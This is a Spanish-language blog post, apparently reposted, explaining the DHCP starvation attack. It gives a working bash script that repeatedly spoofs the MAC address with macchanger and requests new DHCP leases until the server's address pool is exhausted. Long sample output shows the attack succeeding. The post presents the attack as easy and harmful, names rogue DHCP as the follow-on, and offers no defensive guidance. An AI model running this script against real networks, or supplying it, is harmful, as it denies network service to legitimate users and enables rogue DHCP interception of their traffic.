DHCP starvation

DHCP starvation es un ataque que consiste en inundar con peticiones DHCP_REQUEST al servidor DHCP, con direcciones MAC falseadas y con el objetivo de agotar su espacio de direcciones asignables. El objetivo es que el servidor DHCP no sea capaz de responder a otros clientes y realizar otro tipo de ataques (DHCP rogue).

Es un ataque que puede causar mucho daño y muy fácil de implementar.

Simplemente con dhclient y macchanger instalados en tu máquina y el siguiente script, podemos reproducirlo:

sh -v starve.sh

#!/bin/bash



while true; do

# kill all running dhcp clients - just in case

killall dhclient

rm -f /var/run/dhclient.pid



# bring down the interface

ifconfig eth0 down



# change the MAC address of the interface and print the new MAC address

macchanger -a eth0 2>&1 | grep Faked



# bring the interface up

ifconfig eth0 up



# make a new DHCP lease

dhclient eth0 2>&1 | grep DHCPACK

done

Faked MAC: 00:10:a8:19:ef:88 (Reliance Computer Corp.)

DHCPACK of 192.168.0.101 from 192.168.0.1

Faked MAC: 00:0c:5c:cd:fa:df (Gtn Systems B.v.)

DHCPACK of 192.168.0.102 from 192.168.0.1

Faked MAC: 00:09:e6:46:45:f3 (Cyber Switching Inc.)

DHCPACK of 192.168.0.103 from 192.168.0.1

Faked MAC: 00:0d:f1:7b:03:1c (Ionix Inc.)

DHCPACK of 192.168.0.104 from 192.168.0.1

Faked MAC: 00:09:63:e4:c5:14 (Dominion Lasercom Inc.)

DHCPACK of 192.168.0.105 from 192.168.0.1

Faked MAC: 00:10:d6:45:8b:59 (Itt - A/cd)

DHCPACK of 192.168.0.106 from 192.168.0.1

Faked MAC: 00:a0:8b:4b:90:ae (Aston Electronic Designs Ltd.)

DHCPACK of 192.168.0.107 from 192.168.0.1

Faked MAC: 00:50:b6:9c:26:79 (Good Way Ind. Co., Ltd.)

DHCPACK of 192.168.0.108 from 192.168.0.1

Faked MAC: 00:30:44:59:60:85 (Portsmith Llc)

DHCPACK of 192.168.0.109 from 192.168.0.1

Faked MAC: 00:10:6e:2d:70:7a (Tadiran Com. Ltd.)

DHCPACK of 192.168.0.110 from 192.168.0.1

Faked MAC: 00:90:2c:96:f1:77 (Data & Control Equipment Ltd.)

DHCPACK of 192.168.0.111 from 192.168.0.1

Faked MAC: 00:20:cc:dd:04:91 (Digital Services, Ltd.)

DHCPACK of 192.168.0.112 from 192.168.0.1

Faked MAC: 00:0f:0d:e0:60:ae (Hunt Electronic Co., Ltd.)

DHCPACK of 192.168.0.113 from 192.168.0.1

Faked MAC: 00:80:39:ba:9d:42 (Alcatel Stc Australia)

DHCPACK of 192.168.0.114 from 192.168.0.1

Faked MAC: 00:30:d8:1e:d4:aa (Sitek)

DHCPACK of 192.168.0.115 from 192.168.0.1

Faked MAC: 00:01:be:3e:ac:c1 (Gigalink Co., Ltd.)

DHCPACK of 192.168.0.116 from 192.168.0.1

Faked MAC: 00:80:9e:81:c9:cf (Datus Gmbh)

DHCPACK of 192.168.0.117 from 192.168.0.1

Faked MAC: 00:80:f2:f4:3e:39 (Raycom Systems Inc)

DHCPACK of 192.168.0.118 from 192.168.0.1

Faked MAC: 00:0e:1e:c3:c8:19 (Private)

DHCPACK of 192.168.0.119 from 192.168.0.1

Faked MAC: 00:40:35:90:91:9e (Opcom)

DHCPACK of 192.168.0.120 from 192.168.0.1

Faked MAC: 00:80:24:ad:fb:d9 (Kalpana, Inc.)

DHCPACK of 192.168.0.121 from 192.168.0.1

Faked MAC: 00:e0:ee:b5:4f:15 (Marel Hf)

DHCPACK of 192.168.0.122 from 192.168.0.1

Faked MAC: 00:50:03:17:23:47 (Gretag Macbeth Ag)

DHCPACK of 192.168.0.123 from 192.168.0.1

Faked MAC: 00:e0:ef:28:db:37 (Dionex)

DHCPACK of 192.168.0.124 from 192.168.0.1

Faked MAC: 00:0f:a5:ba:1f:1d (Smp / Bwa Technology Gmbh)

DHCPACK of 192.168.0.125 from 192.168.0.1

Faked MAC: 00:08:1e:5a:e3:d9 (Repeatit Ab)

DHCPACK of 192.168.0.126 from 192.168.0.1

Faked MAC: 00:0e:52:7f:eb:c5 (Optium Corporation)

DHCPACK of 192.168.0.127 from 192.168.0.1

Faked MAC: 00:50:10:b6:f1:f0 (Novanet Learning, Inc.)

DHCPACK of 192.168.0.128 from 192.168.0.1

Faked MAC: 00:04:2a:14:14:11 (Wireless Networks, Inc.)

DHCPACK of 192.168.0.129 from 192.168.0.1

Faked MAC: 00:60:b2:49:66:ac (Process Control Corp.)

DHCPACK of 192.168.0.130 from 192.168.0.1

Faked MAC: 00:a0:44:14:5e:8a (Ntt It Co., Ltd.)

DHCPACK of 192.168.0.131 from 192.168.0.1

Faked MAC: 00:90:f5:06:6d:f3 (Clevo Co.)

.

.

.

.

DHCPACK of 192.168.0.196 from 192.168.0.1

Faked MAC: 00:30:40:a3:d0:37 (Cisco Systems, Inc.)

DHCPACK of 192.168.0.197 from 192.168.0.1

Faked MAC: 00:20:94:9e:c7:32 (Cubix Corporation)

DHCPACK of 192.168.0.198 from 192.168.0.1

Faked MAC: 00:40:9d:f9:15:13 (Digiboard, Inc.)

Faked MAC: 00:05:0d:10:15:2f (Midstream Technologies, Inc.)

Faked MAC: 00:0d:3c:7e:ea:92 (I.tech Dynamic Ltd)

Faked MAC: 00:07:dc:51:c3:e9 (Atek Co, Ltd.)

Faked MAC: 00:02:18:3c:73:cb (Advanced Scientific Corp)


Extraído de http://unlugarsinfin.blogspot.es

Comentarios